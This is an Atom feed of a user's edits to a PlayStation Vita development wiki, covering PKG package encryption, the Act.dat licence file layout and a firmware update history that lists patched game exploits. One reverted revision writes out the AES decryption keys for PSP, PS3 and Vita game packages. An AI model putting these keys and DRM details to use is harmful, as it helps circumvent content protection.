http://wiki.henkaku.xyz/vita/api.php?action=feedcontributions&user=Xyz&feedformat=atom
Vita Development Wiki - User contributions [en]
2024-03-29T12:54:36Z
User contributions
MediaWiki 1.35.14
http://wiki.henkaku.xyz/vita/index.php?title=Main_Page/Header&diff=17406
Main Page/Header
2022-07-13T14:48:38Z
<p>Xyz: </p>
<hr />
<div><br />
== Welcome To Vita Development Wiki ==<br />
<br />
Chat with us on [https://discord.gg/m7MwpKA Discord].</div>
Xyz
http://wiki.henkaku.xyz/vita/index.php?title=Main_Page/Header&diff=17405
Main Page/Header
2022-07-13T14:46:28Z
<p>Xyz: </p>
<hr />
<div><br />
== Welcome To Vita Development Wiki ==<br />
<br />
Chat with us on Discord: [https://discord.gg/m7QGqj5 HENkaku #wiki] (most active, stay around until someone answers!).</div>
Xyz
http://wiki.henkaku.xyz/vita/index.php?title=Packages&diff=13481
Packages
2020-02-17T19:26:33Z
<p>Xyz: </p>
<hr />
<div>PKG files for PSVita are essentially the same structure as PS3 and PSP game PKG files with different AES, RSA and ECC keys.<br />
<br />
== Algorithm ==<br />
<br />
=== Keys ===<br />
<br />
See [[Keys#PKG_AES_Keys]].<br />
<br />
The overall algorithm is the same as PSP with one exception.<br />
<br />
=== PS3 / PSP ===<br />
<br />
On the PS3/PSP, the file table and the data are AES-CTR encrypted using the 0x10 bytes at offset 0x70 in the file as the IV, with the PS3/PSP AES key as the CTR key.<br />
<br />
=== PSVita / PSM ===<br />
<br />
On the PSVita, for types 2, 3 and 4, the 0x10 bytes at offset 0x70 are first AES-encrypted to create a new AES session key; the normal AES-CTR step is then done with the bytes at 0x70 as the IV and the new session key as the AES-CTR key.<br />
<br />
=== PKG key id ===<br />
<br />
At offset 0xE7 in the PKG file is a version byte. This is only present in PSP-type PKG files, inside the .ext section. If it is type 1, use the PSP key as normal; if it is type 2, use the PSV2 key with the new session key step; if it is type 3, use the PSV3 key, etc.<br />
<br />
== Installing ==<br />
<br />
Package Installer uses SceNpDrm to decrypt/extract the game package into a temporary directory. Then it calls scePromoterUtilityPromotePkgWithRif on 1.69 and scePromoterUtilityPromotePkg on 1.80+ to "promote" (aka install) the files into the right directory in ux0. ScePromoterUtil is just a wrapper for a SceShellSvc call, so SceShell actually moves the files, then adds the LiveArea bubble and updates app.db accordingly. After getting userland execution, you can use SceNpDrm and ScePromoterUtil separately and package your games in an alternative format, for example .vpk.<br />
<br />
<br />
[[Category:Formats]]</div>
Xyz
http://wiki.henkaku.xyz/vita/index.php?title=Packages&diff=13480
Packages
2020-02-17T19:23:56Z
<p>Xyz: Reverted edits by CelesteBlue (talk) to last revision by St4rk</p>
<hr />
<div>PKG files for PSVita are essentially the same structure as PS3 and PSP game PKG files with different AES, RSA and ECC keys.<br />
<br />
== AES Keys ==<br />
There are now 5 AES keys used for the decryption of game PKG files.<br />
<br />
*PSP : <code>{ 0x07, 0xf2, 0xc6, 0x82, 0x90, 0xb5, 0x0d, 0x2c, 0x33, 0x81, 0x8d, 0x70, 0x9b, 0x60, 0xe6, 0x2b };</code><br />
*PS3 : <code>{ 0x2e, 0x7b, 0x71, 0xd7, 0xc9, 0xc9, 0xa1, 0x4e, 0xa3, 0x22, 0x1f, 0x18, 0x88, 0x28, 0xb8, 0xf8 };</code><br />
*PSV2: <code>{ 0xE3, 0x1A, 0x70, 0xC9, 0xCE, 0x1D, 0xD7, 0x2B, 0xF3, 0xC0, 0x62, 0x29, 0x63, 0xF2, 0xEC, 0xCB };</code><br />
*PSV3: <code>{ 0x42, 0x3A, 0xCA, 0x3A, 0x2B, 0xD5, 0x64, 0x9F, 0x96, 0x86, 0xAB, 0xAD, 0x6F, 0xD8, 0x80, 0x1F };</code><br />
*PSV4: <code>{ 0xAF, 0x07, 0xFD, 0x59, 0x65, 0x25, 0x27, 0xBA, 0xF1, 0x33, 0x89, 0x66, 0x8B, 0x17, 0xD9, 0xEA };</code><br />
<br />
The overall algorithm is the same as PSP with one exception. On the PSP, the file table and the data are AES-CTR encrypted using the 0x10 bytes at offset +0x70 in the file as the IV, with the PSP AES key as the CTR key. On the PSVita, for types 2, 3 and 4, the 0x10 bytes at +0x70 are first AES-encrypted to create a new AES session key; the normal AES-CTR step is then done with the bytes at +0x70 as the IV and the new session key as the AES-CTR key.<br />
<br />
<br />
At offset +0xE7 in the PKG file is a version byte. This is only present in PSP-type PKG files, inside the .ext section. If it is type 1, use the PSP key as normal; if it is type 2, use the PSV2 key with the new session key step; if it is type 3, use the PSV3 key, etc.<br />
<br />
== Installing ==<br />
<br />
Package Installer uses SceNpDrm to decrypt/extract the game package into a temporary directory. Then it calls ScePromoterUtil NID 0x86641BC6 on 1.69 and NID 0x716C81F4 on 1.80+ to "promote" (aka install) the files into the right directory in ux0. ScePromoterUtil is just a wrapper for a SceShellSvc call, so SceShell actually moves the files, then adds the LiveArea bubble and updates app.db accordingly. In theory you can use SceNpDrm and ScePromoterUtil separately and package your games in an alternative format.<br />
<br />
[[Category:Formats]]</div>
Xyz
http://wiki.henkaku.xyz/vita/index.php?title=Act.dat&diff=12683
Act.dat
2019-12-27T22:07:28Z
<p>Xyz: Reverted edits by Princess of Sleeping (talk) to last revision by SKGleba</p>
<hr />
<div>== Structure ==<br />
<br />
{| class="wikitable sortable"<br />
| style="background-color:#123EDA; color:#FFFFFF;" |'''Name'''<br />
| style="background-color:#123EDA; color:#FFFFFF;" |'''Offset'''<br />
| style="background-color:#123EDA; color:#FFFFFF;" |'''Size''' <br />
| style="background-color:#123EDA; color:#FFFFFF;" |'''Example'''<br />
| style="background-color:#123EDA; color:#FFFFFF;" |'''Remark'''<br />
|-<br />
| Activation Type || 0x0 || 0x4 || 00000001 || <br />
|-<br />
| Version || 0x4 || 0x4 || 00000001, 00000002 || 1(old) or 2(current)<br />
|-<br />
| Account ID || 0x8 || 0x8 || AB CD EF 01 02 34 78 91 || PSN Account ID<br />
|-<br />
| Primary Key Table || 0x10 || 0x800 || N.A || Encrypted RIF keys table<br />
|-<br />
| Unknown1 || 0x810 || 0x40 || N.A||<br />
|-<br />
| OpenPsId || 0x850 || 0x10 || N.A|| <br />
|-<br />
| Unknown3 || 0x860 || 0x10 || N.A|| Encrypted_data for v.1 / Padding for v.2<br />
|-<br />
| Unknown4 || 0x870 || 0x10 || N.A|| Encrypted_data for v.1 / Time_Stamp for v.2<br />
|-<br />
| Secondary Table || 0x880 || 0x650 || N.A ||<br />
|-<br />
| RSA Signature|| 0xED0 || 0x100 || N.A|| RSA Public Key for RIF type 0 and 1<br />
|-<br />
| Unknown Sig || 0xFD0 || 0x40 || N.A|| params are unknown<br />
|-<br />
| ECDSA Signature || 0x1010 || 0x28 || N.A|| pub=vsh_pub, ctype=0x02(vsh_curves)<br />
|}<br />
<br />
The Primary Key table is unique per PSN account. It is encrypted using ECB with the ConsoleId of the console activated with this PSN account.</div>
Xyz
http://wiki.henkaku.xyz/vita/index.php?title=System_Software&diff=11838
System Software
2019-10-18T01:25:45Z
<p>Xyz: /* Version 3 */</p>
<hr />
<div>== History of updates ==<br />
Originally taken from [https://en.wikipedia.org/w/index.php?title=PlayStation_Vita_system_software&oldid=746007330 Wikipedia].<br />
<br />
=== Version 1 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''1.03'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.04'''<br />December 17, 2011<br />
|<br />
* Provided only with Shin Kamaitachi no Yoru: 11 Hitome no Suspect<br />
|-<br />
|align=center|'''1.05'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.06'''<br />February 15, 2012<br />
|<br />
* EU release firmware<br />
* US First Edition Bundle release firmware<br />
|-<br />
|align=center|'''1.50'''<br />December 17, 2011<br />
|<br />
;System<br />
* Support for the PlayStation Vita cradle.<br />
|-<br />
|align=center|'''1.51'''<br />December 27, 2011<br />
|<br />
;System<br />
* Addresses freezing issues with certain games.<br />
|-<br />
|align=center|'''1.52'''<br />January 16, 2012<br />
|<br />
;System<br />
*Improved system stability.<br />
*The 1.51 bug where the 3G/Wi-Fi SKU would not recognize a SIM card has been fixed.<ref>http://www.theverge.com/gaming/2012/1/16/2712066/playstation-vita-updated-to-version-1-52-in-japan-fixes-3g-sim</ref><br />
|-<br />
|align=center|'''1.60'''<ref>http://play-beyond.net/2012/02/08/ps-vita-system-update-1-60-full-change-log/</ref><br />February 8, 2012<br />
|<br />
;Apps<br />
*An application powered by Google Maps has been added.<br />
<br />
;Near<br />
*In [near], information about players is now displayed on the [Discoveries] screen.<br />
<br />
;Content Manager<br />
*Users can now delete backup files in [Content Manager].<br />
<br />
;Photos<br />
*Users can now record video under the [Photos] application.<br />
<br />
;System<br />
*The PS button will now flash blue while the battery is charging.<br />
*In [Settings], the position where [Flight Mode] appears has been changed.<br />
*You can now publish stories about the products that you rate in PlayStation Store to Facebook.<br />
*You can now report inappropriate messages in [Group Messaging] and inappropriate comments about an activity.<br />
*“PlayStation Network account” has been renamed to “Sony Entertainment Network account”.<br />
|-<br />
|align=center|'''1.61'''<ref>http://blog.us.playstation.com/2012/02/20/ps-vita-system-software-update-v1-61</ref><br />February 21, 2012<br />
|<br />
;System<br />
*Improves certain aspects of the system software.<br />
*Fixed [[Vulnerabilities#Syscall_handler_doesn.27t_check_syscall_number|SVC table overflow vulnerability]]. (Pretty sure this is the version they fixed it in [[User:Xyz|Xyz]] ([[User talk:Xyz|talk]]) 04:24, 19 April 2017 (UTC))<br />
|-<br />
|align=center|'''1.65'''<ref>http://blog.us.playstation.com/2012/04/02/ps-vita-system-software-update-v1-65</ref><br />April 3, 2012<br /><small>''Replaced with 1.66''</small><br />
|<br />
;System<br />
* [Notification Alert] has been added to [Settings], allowing users to toggle alerts on and off.<br />
* [After 10 Minutes] has been added to time options under [Power Save Settings].<br />
* Caps Lock is now supported in the On Screen Keyboard.<br />
* An arrow icon will now display when PS Vita finds new activities in the LiveArea.<br />
* Addition of installation progress bar for downloaded games and DLC.<br />
* minis with a pre-set expiry date (such as those obtained via PlayStation Plus) now load correctly.<br />
* Fixes security issues with two PSP games that allowed users to run unauthorized content on the device through an exploit.<ref>http://wololo.net/wagic/2012/04/04/ps-vita-firmware-update-1-66-available/</ref> <br />
|-<br />
|align=center|'''1.66'''<ref>http://www.engadget.com/2012/04/04/playstation-vita-1-66-firmware-update/</ref><br />April 4, 2012<br />
|<br />
;System<br />
* Fixed problems which appeared in 1.65<br />
* [Settings]<br />
* The [System Music] setting in [Settings] > [Sound and Display] now affects background music in [PS Store], [near], the Sign-Up screens, and the Home menu.<br />
* The display time of notification alerts has been reduced from 5 seconds to 3 seconds.<br />
* Functional improvements have been made in the following games and applications: Unit 13, Gravity Daze, near.<br />
<br />
;Near<br />
* When searching for location data, users now have the option to [Retry] and [Cancel] when a failure occurs.<br />
* A direct link to [PS Store] is made available for new applications that users may discover on [near].<br />
* Users can now update data at any time within [near], provided they are within the same location.<br />
|-<br />
|align=center|'''1.67'''<ref>http://exophase.com/36431/ps-vita-firmware-1-67-goes-live/</ref><br />April 11, 2012<br />
|<br />
;System<br />
* Resolves an issue with the camera functionality when playing ''Dream Club Zero Portable''.<ref>http://www.jp.playstation.com/psvita/update/</ref> <br />
|-<br />
|align=center|'''1.69'''<ref>http://blog.us.playstation.com/2012/06/11/ps-vita-at-e3-minor-system-software-update-coming/</ref><br />June 11, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Improved system stability<br />
* A savegame exploit within Super Collapse 3 has been patched, disallowing the usage of VHBL via the game.<ref>12 June 2012, [http://wololo.net/2012/06/12/ps-vita-firmware-1-69-patches-the-super-collapse-3-exploit/ PS Vita Firmware 1.69 patches the Super Collapse 3 exploit], Wololo.net</ref><br />
* Resolves a compatibility issue with the PlayStation Portable game ''Conception: Ore no Kodomo wo Undekure!''.<ref>http://andriasang.com/con1f1/conception_firmware/</ref> <br />
|-<br />
|align=center|'''1.691'''<br />July 4, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Resolves a compatibility issue with the PS Vita demo for ''Escape Plan''.<br />
|-<br />
|align=center|'''1.80'''<ref>[http://blog.us.playstation.com/2012/08/14/psone-classics-coming-to-ps-vita-via-the-latest-system-software-update-v1-80/ PSone Classics Coming to PS Vita via the latest System Software Update (v1.80) – PlayStation.Blog]. Blog.us.playstation.com (2012-08-14). Retrieved on 2013-08-23.</ref><br />August 28, 2012<br />
|<br />
;System<br />
* Users can now control the home screen, as well as some applications like [Music] and [Video], with the PS Vita system's buttons.<br />
* Notification settings under [Sound & Display Settings] have been moved to their own [Notification Settings] menu.<br />
* The items under [Date & Time] > [Date & Time Settings] have been changed.<br />
* A Japanese keyboard has been added.<br />
* Memory cards are now locked to PSN accounts, to prevent users from switching between accounts. The system will refuse to accept a memory card locked to another account unless the memory card is reformatted.<ref>http://i.imgur.com/4nsEl.jpg</ref><br />
* The layout of category lists have been improved in [Photos], [Music], and [Videos].<br />
* The [Notification Center] has been redesigned.<br />
* Importing content from a PC or PlayStation 3 has been improved.<br />
* The [Help] feature of the LiveArea has been improved.<br />
* Icons for some menu items have been changed.<br />
* Users can now report some errors to Sony Computer Entertainment.<br />
* Background colors have been changed.<br />
* Fixed a [[Vulnerabilities#Stack_buffer_overflow_in_sceSblDmac5EncDec|stack buffer overflow in sceSblDmac5EncDec]] and a ton of other vulns.<br />
<br />
;Remote Play<br />
* Added [Cross-Controller] feature to allow the PS Vita system to interact as a secondary controller with a PlayStation 3 system.<br />
<br />
;Games<br />
* Users can now play select PSone Classics from the PlayStation Store.<br />
* Users can now map more combinations of PSP system buttons to the PS Vita right analog stick when playing PSP games or minis. In addition, users can also map a PSP system button to each of the four corners of the PS Vita system touch screen.<br />
* [Import Saved Data] has been added to the LiveArea screen. This will only be shown for games that support this feature.<br />
<br />
;Photos<br />
* The MPO format can now be viewed on the PS Vita system. Additionally, it is now possible to transfer MPO files using a PlayStation 3 or PC using Content Manager. 3D and multi-angle viewing are not supported.<br />
<br />
;Music<br />
* Playlists in iTunes (10.6.3 or later), M3U, and M3U8 formats are now supported in [Music].<br />
* Playlists can also be transferred from a PS3 system.<br />
<br />
;Videos<br />
* Playback speed control and repeat play have been added to [Video].<br />
* When moving the progress bar during video playback, it now shows the image of the specified location in the video.<br />
* A thumbnail for videos will now be generated automatically when there is no thumbnail information available.<br />
* Users can now copy photos or videos to a PC or PS3 while a photo or video is displayed.<br />
<br />
;Friends<br />
* Users can now delete multiple friend requests simultaneously.<br />
<br />
;Near<br />
* [near] can now gather information of surrounding Wi-Fi access points without an Internet connection and will update location data based on this information at a later time.<br />
* The LiveArea screen for [near] has been improved and now shows lifetime statistics.<br />
<br />
;Group Messaging<br />
* There have been layout improvements made to [Group Messaging].<br />
* Users can now take photos using the camera to add as attachments in [Group Messaging].<br />
* The [New Message] button on the [Group Messaging] LiveArea screen has been removed.<br />
<br />
;Maps<br />
[Maps] has been improved by adding a button to the top of the screen to switch between [Search for Location] and [Search for Directions]. Users can also touch and hold a location on the map to place a flag.<br />
<br />
;Browser<br />
* The use of the rear touchpad for scrolling and zooming is now supported in the [Browser].<br />
* Users are no longer able to use a JavaScript bookmark trick to download YouTube videos in the [Browser].<br />
* A button has been added to the [Browser] to immediately go to the top of the page.<br />
<br />
;Party<br />
* Users can now view a history of up to 100 chat messages and information in [Party].<br />
|-<br />
|align=center|'''1.81'''<ref>[https://twitter.com/PlayStation/status/247851681428164609 Twitter / PlayStation: PS Vita system software update]. Twitter.com. Retrieved on 2013-08-23.</ref><br />September 17, 2012<br />
|<br />
;System<br />
* Software stability has been improved.<br />
* A savegame exploit within Monster Hunter Freedom Unite has been patched, disallowing the usage of VHBL via the game.<ref>18 September 2012, [http://wololo.net/2012/09/18/vita-firmware-1-81-is-out-patches-vhbl/ Vita Firmware 1.81 is out, patches VHBL], Wololo.net</ref><br />
<br />
;Treasure Park<br />
* An issue was resolved where the game would fail to load properly if the user had received too many treasure sheets.<br />
|-<br />
|}<br />
<br />
=== Version 2 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''2.00'''<ref>[http://blog.us.playstation.com/2012/11/13/playstation-plus-for-ps-vita-available-next-week-take-the-tour/ PlayStation Plus for PS Vita Available Next Week – Take the Tour – PlayStation.Blog]. Blog.us.playstation.com (2012-11-13). Retrieved on 2013-08-23.</ref><br />November 19, 2012<br />
|<br />
;System<br />
* System buttons can now be used in more applications.<br />
* Turkish has been added as a system language.<br />
* In [Settings], users can now set how they will be alerted depending on the type of notification.<br />
* [Disconnect Wi-Fi Connection Automatically] has been added to [Network] > [Wi-Fi Settings].<br />
* [PlayStation Network]<br />
* Support for PlayStation Plus has been added.<br />
* Users can now connect their PlayStation Network account to Twitter.<br />
* [Avatar], [Panel], [Online ID], [About Me] and [My Languages] under [PlayStation Network] > [Account Information] have been moved to the new category [Profile].<br />
* [PlayStation Mobile] has been added under [System].<br />
* Screenshots are now saved in the background.<br />
* Trophy synchronization is now performed in the background.<br />
* A savegame exploit within Urbanix has been patched.<br />
* Users can now delete screenshots or songs from PlayStation Portable games.<br />
<br />
;Content Manager<br />
* [Content Manager] has been redesigned.<br />
* Users can now transfer content to and from PlayStation Plus online storage, to and from a PS3, and to and from a PC via Wi-Fi.<br />
<br />
;Browser<br />
* The rendering engine has been improved.<br />
* The [Browser] now uses additional GPU processing power.<br />
* Tapping on a YouTube link will now open the respective video in the YouTube app.<br />
* The HTML5 and JavaScript engines have been upgraded.<br />
* Users can now send their current [Browser] URL using their Twitter settings.<br />
* Users can now access the [Browser] while in an application or game.<ref>Shuhei Yoshida on Twitter. https://twitter.com/yosp/status/270429820712783872</ref><br />
* A pointer can now be used (in conjunction with pressing L or R and tapping on the screen) to select links.<br />
<br />
;Apps<br />
* [Email] has been added as an application.<br />
<br />
;Maps<br />
* [Maps] can now display weather information for locations where it is available.<br />
<br />
;Near<br />
* The layout of [Near] has been revised.<br />
<br />
;Friends<br />
* The activities list for Friends has been moved to the LiveArea screen.<br />
* Users can now attach a comment when sending a friend request.<br />
* Users can now file a [Grief Report] for inappropriate comments when sent with a friend request.<br />
* TIFF, BMP, PNG, GIF, and MPO are now supported as file formats in [Group Messaging].<br />
<br />
;Videos<br />
* The PS Vita system can now display videos with 1080 resolution.<br />
* Videos can now display captioning.<br />
* Videos can now be played in slow motion.<br />
* Users can now skip chapters in videos.<br />
* Folders can now be transferred from a PS3 or PC to the PS Vita for [Photos] and [Videos].<br />
* When browsing lists in Music and Videos, titles will now scroll horizontally if they are too long.<br />
<br />
;PSone Classics<br />
* [Assign Touchscreen] and [Assign Rear Touch Pad] have been added to [Controller Settings].<br />
* [Custom] has been added to [Other Settings] > [Screen Mode].<br />
|-<br />
|align=center|'''2.01'''<ref>[http://www.playstationlifestyle.net/2012/12/03/ps-vita-firmware-v2-01-is-live-download-now/ PS Vita Firmware v2.01 is Live, Download Now]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 3, 2012<br />
|<br />
;PlayStation Plus<br />
* Issue with the [Upload Automatically] setting for saved data has now been corrected.<br />
<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.02'''<ref>[http://www.playstationlifestyle.net/2012/12/18/playstation-vita-system-software-version-2-02-now-available-for-download/ PlayStation Vita System Software Version 2.02 Now Available For Download]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 19, 2012<br />
|<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.05'''<ref>[http://www.playstationlifestyle.net/2013/01/22/ps-vita-system-software-version-2-05-likely-coming-today-seems-to-be-mandatory/ PS Vita System Software Version 2.05 Likely Coming Today, Seems to be Mandatory]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><br />January 24, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in UNO game. <br />
|-<br />
|align=center|'''2.06'''<ref>[https://twitter.com/PlayStation/status/311264776577765376 Twitter / PlayStation: Heads up - PS Vita v2.06 software]. Twitter.com. Retrieved on 2013-08-23.</ref><br />March 12, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in Dissidia Duodecim PSP game.<br />
* Closes JavaScript URL spoofing exploit in Browser.<ref>[http://www.securityfocus.com/archive/1/525576 Sony Playstation Vita Browser - firmware 2.05 - Adressbar spoofing]. Securityfocus.com. Retrieved on 2013-12-09.</ref><br />
|-<br />
|align=center|'''2.10'''<ref>[http://blog.us.playstation.com/2013/04/09/ps-vita-system-software-update-v-2-10/ PS Vita System Software Update (v.2.10) – PlayStation.Blog]. Blog.us.playstation.com (2013-04-09). Retrieved on 2013-08-23.</ref><ref>[http://uk.playstation.com/psvita/support/system-software/detail/item596991/Update-features-%28ver-2-10%29/ Update features (ver 2.10) - PS Vita System Software]. Uk.playstation.com. Retrieved on 2013-08-23.</ref><br />April 9, 2013<br />
|<br />
;System<br />
* Users can now create folders, with a maximum of 10 icons per folder, and up to 100 icons (including folders) on the home screen.<br />
* Users can now verify which PS Vita card is in their system by looking at the information bar.<br />
* Users can now save home screen layouts per PS Vita card.<br />
* When [Mute Automatically] is toggled in [Settings], the PS Vita will mute speakers when a headset is unplugged. Similarly, music will now pause if a headset is unplugged when the music app is used.<br />
* [Use Wi-Fi in Power Save Mode] has been added to [Power Save Settings].<br />
* [Disconnect Wi-Fi Connection Automatically] has been removed.<br />
* Patches an exploit in the game Apache Overkill.<ref>09 September 2013, [http://wololo.net/2013/04/10/mandatory-vita-2-10-update-live-and-blocks-apache-overkill-exploit/ Mandatory Vita 2.10 Update Live and Blocks Apache Overkill Exploit], Wololo.net</ref><br />
<br />
;PlayStation Plus<br />
* PlayStation Plus members can now automatically update [PlayStation Mobile] software and upload game save data using a 3G connection.<br />
* Users can now upload or download game save data using a 3G network.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been added (a memory card is required; some videos are not supported).<br />
<br />
;Email<br />
* Enhancements to [Email] now allow users to view HTML messages, add multiple email addresses to contacts, and search messages.<br />
<br />
;Group Messaging<br />
* Users can now send messages to multiple recipients.<br />
<br />
;Photos<br />
* Still images can now be displayed in high resolution when zoomed in.<br />
<br />
;Content Manager<br />
* Users can now check for system updates when plugging their PS Vita into their PS3 system. The system version of the PS3 must be 4.40 or higher.<br />
* Users can now add a name for the PS Vita backup data when saving to a PS3 or PC. The system version of the PS3 must be 4.40 or higher, and the Content Manager Assistant application must be updated.<br />
<br />
;PlayStation Store<br />
* When reporting PlayStation Mobile content as inappropriate, users can now include details.<br />
|-<br />
|align=center|'''2.11'''<ref>[http://www.psu.com/a019092/PS-Vita-firmware-211-is-now-live [UPDATE&#93; PS Vita firmware 2.11 is now live - PlayStation Universe]. Psu.com (2013-04-16). Retrieved on 2013-08-23.</ref><br />April 16, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
* Stabilizes the playback of certain titles.<br />
|-<br />
|align=center|'''2.12'''<ref>[http://terminalgamer.com/2013/05/07/optional-ps-vita-system-update-2-12-live-now/ Optional PS Vita System Update 2.12 Live Now]. Terminal Gamer (2013-05-08). Retrieved on 2013-08-23.</ref><br />May 8, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
|-<br />
|align=center|'''2.50'''<br />''Pre-installed Only''<br><br />
First found on October 10, 2013<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PCH-2000 model.<br />
*It adds support for PlayStation Vita Slim (PCH-2000), but otherwise the firmware is identical to the previous version (2.12).<br />
|-<br />
|align=center|'''2.60'''<ref>[http://www.playstationlifestyle.net/2013/08/05/ps-vita-firmware-update-v2-60-released-download-now/ PS Vita Firmware Update v2.60 Released, Download Now]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><ref>[http://wololo.net/2013/08/06/psvita-mandatory-ofw-2-60-now-live/ PSVITA Mandatory OFW 2.60 Now Live ·]. Wololo.net (2013-08-06). Retrieved on 2013-08-23.</ref><br />August 5, 2013<br />
|<br />
* Default release firmware for the PlayStation Vita TV in Japan.<br />
;System<br />
* [Devices] has been added under [Settings].<br />
** [Bluetooth Settings] has been moved to [Devices].<br />
* The Quick Access Menu when the PS button is held has been improved.<br />
* Stability improvements.<br />
* Anti-aliasing has been applied to home screen icons.<br />
* Closes exploit in Gamocracy One: Legend of Robot.<br />
* Closes undisclosed exploit in Pool Hall Pro.<br />
* Fixes screenshot compression bug for ''Gravity Rush'' and ''Everybody's Golf'' introduced in firmware 2.10.<br />
<br />
;LiveArea<br />
* The LiveArea for [Content Manager] and [Photos] has been updated.<br />
<br />
;PlayStation Plus<br />
* A [PlayStation Plus] icon has been added to the LiveArea to allow users to easily upload or download saved data.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been extended.<br />
<br />
;Content Manager<br />
* Users can now use content on a remote system before transferring it.<br />
<br />
;Trophies<br />
* Trophies can now be hidden.<br />
|-<br />
|align=center|'''2.61'''<ref>[http://www.playstationlifestyle.net/2013/08/28/ps-vita-system-firmware-update-v2-61-coming-soon-improves-some-software-stability/ PS Vita System Firmware Update v2.61 Coming Soon, Improves Some Software]. PlayStation LifeStyle. Retrieved on 2013-08-28.</ref><br />August 28, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within Arcade Darts and other games has been patched, disallowing the usage of VHBL via the game.<ref>29 August 2013, [http://wololo.net/2013/08/29/ps-vita-compulsory-firmware-2-61-is-out-patches-the-arcade-exploits/ PS Vita compulsory Firmware 2.61 is out, patches the ‘Arcade’ exploits], Wololo.net</ref><br />
|-<br />
|}<br />
<br />
=== Version 3 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''3.00'''<br />November 5, 2013<br />
|<br />
;System<br />
* [Parental Controls] has been added to the home screen.<br />
* Future system software updates can now be downloaded automatically.<br />
* Portuguese (Portugal) language has been updated to reflect changes due to the Portuguese Language Orthographic Agreement of 1990.<br />
* System stability has been improved.<br />
* Several game exploits (Fieldrunners and other, previously undisclosed, titles) were fixed. This disallows the usage of VHBL via these games.<ref>11 November 2013, [http://wololo.net/2013/11/11/sony-patched-up-to-20-exploits-with-vita-firmware-3-00/ Sony patched up to 20 exploits with Vita firmware 3.00], Wololo.net</ref><br />
<br />
;Trophies<br />
* Trophies for PS4 software can now be displayed on PS Vita.<br />
<br />
;Content Manager<br />
* Users can now transfer content to and from a PS3 with Wi-Fi on the same network, when the PS3 is version 4.50 or newer.<br />
<br />
;Messages<br />
* [Group Messaging] has been renamed to [Messages].<br />
* The icon has been changed.<br />
* Messages can now be sent to and from the PS4 and mobile devices running the PlayStation App.<br />
<br />
;Email<br />
* Contacts can now be synchronized from Gmail and Yahoo! Mail using CardDAV.<br />
<br />
;Party<br />
* The icon has been changed.<br />
* Users can now voice and text chat with friends on PS4.<br />
<br />
;Remote Play<br />
* [Remote Play] has been renamed to [PS3 Remote Play].<br />
<br />
;PS4 Link<br />
* [PS4 Link] has been added to the home screen.<br />
<br />
;Friends<br />
* The layout for the [Friends] application has changed. There are now four tabs available:<br />
** Find Player on PSN<br />
** Friends<br />
** Friend Requests<br />
** Players Blocked<br />
<br />
;Photos<br />
* Users can now take panoramic photos with the PS Vita's camera.<br />
* Panoramic photos can be viewed using the system's motion sensor.<br />
|-<br />
|align=center|'''3.01'''<ref name="PSVita301">[http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits]. Wololo.net. Retrieved on 2013-12-10.</ref><br />December 5, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within several games has been patched, disallowing the usage of VHBL/eCFW via the games.<ref>10 December 2013, [http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits], Wololo.net</ref><br />
|-<br />
|align=center|'''3.10'''<ref name="PSVita310">[http://blog.eu.playstation.com/2014/03/25/playstation-vita-system-software-update-3-10-coming-soon/ PS Vita System Software Update 3.10 Coming Soon]. PlayStation Blog. Retrieved on 2014-03-25.</ref><br />March 25, 2014<br />
|<br />
;System<br />
* The number of applications that can be displayed on the home screen has increased to 500.<br />
* [Adjust Daylight Savings Automatically] has been added.<br />
* [30 minutes] has been added to [Enter Standby Mode Automatically].<br />
* (''Japan only'') PocketStation functionality has been integrated into the system software.<ref name=fami310>2014-03-25, [http://www.famitsu.com/news/201403/25050481.html PS Vita、PS Vita TVのシステムソフトウェア バージョン3.10が提供開始、カレンダー機能追加など盛りだくさん!], Famitsu</ref><br />
* Added DualShock 4 compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Added PlayStation Mobile compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Use of an [External Keyboard] is now supported (for example, PlayStation Bluetooth Wireless Keypad).<br />
* Savegame exploits in various exploit titles got fixed.<br />
* Savegame exploits in various additional undisclosed exploit titles got fixed as well.<br />
* Internal firmware changes now prevent the execution of bigger files (e.g. TN-V/ARK eCFW) via exploits in PSP Minis, if these PSP Minis lack network functions.<br />
<br />
;Apps<br />
* Added a new [Calendar] application that synchronizes with Google Calendar.<br />
<br />
;Content Manager<br />
* Added [Manage Content on Memory Card] option.<br />
<br />
;Messages<br />
* Messages sent and received now include voice messages.<br />
<br />
;Parental Controls<br />
* Access to the PS Store can now be restricted.<br />
* Added a children's age guide.<br />
<br />
;Music<br />
* Users can now search on connected devices such as a PC.<br />
<br />
